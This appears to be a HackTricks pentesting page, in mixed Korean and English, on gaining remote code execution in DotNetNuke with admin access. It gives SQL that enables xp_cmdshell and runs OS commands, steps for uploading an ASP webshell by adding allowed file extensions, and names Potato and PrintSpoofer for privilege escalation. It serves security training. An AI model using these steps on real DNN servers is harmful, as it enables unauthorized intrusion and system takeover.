DotNetNuke (DNN)

Reading time: 2 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

DotNetNuke (DNN)

DNN에 관리자로 로그인하면 RCE를 얻는 것이 쉽습니다.

RCE

SQL을 통한 방법

Settings 페이지에서 SQL 콘솔에 접근할 수 있으며, 여기서 **xp_cmdshell**을 활성화하고 운영 체제 명령을 실행할 수 있습니다.

**xp_cmdshell**을 활성화하려면 다음 줄을 사용하세요:

sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

그리고 **"Run Script"**를 눌러 해당 SQL 문을 실행합니다.

그런 다음, 다음과 같은 방법을 사용하여 OS 명령을 실행합니다:

sql
xp_cmdshell 'whoami'

Via ASP webshell

In Settings -> Security -> More -> More Security Settings you can 새로운 허용된 확장자 추가 under Allowable File Extensions, and then clicking the Save button.

Add asp or aspx and then in /admin/file-management upload an asp webshell called shell.asp for example.

Then access to /Portals/0/shell.asp to access your webshell.

Privilege Escalation

You can 권한 상승 using the Potatoes or PrintSpoofer for example.

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기